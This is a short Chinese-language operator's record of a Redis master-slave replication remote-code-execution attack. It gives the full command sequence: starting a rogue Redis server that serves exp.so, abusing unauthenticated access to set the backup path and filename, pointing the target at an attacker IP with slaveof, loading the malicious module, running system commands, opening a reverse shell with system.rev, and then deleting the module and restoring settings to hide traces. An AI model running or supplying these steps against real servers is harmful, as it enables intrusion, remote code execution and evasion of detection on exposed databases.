一、主从复制RCE
手动操作过程记录:
1、编写脚本,构造恶意Redis服务器,监听本地端口1234,加载exp.so。
python RogueServer.py --lport 1234 --exp exp.so
2、通过未授权访问连入要攻击的redis服务器。
执行相关命令:
#设置redis的备份路径为当前目录 config set dir ./ #设置备份文件名为exp.so,默认为dump.rdb config set dbfilename exp.so #设置主服务器IP和端口 slaveof 192.168.172.129 1234 #加载恶意模块 module load ./exp.so #切断主从,关闭复制功能 slaveof no one #执行系统命令 system.exec 'whoami' system.rev 127.0.0.1 9999 #通过dump.rdb文件恢复数据 config set dbfilename dump.rdb #删除exp.so system.exec 'rm ./exp.so' #卸载system模块的加载 module unload system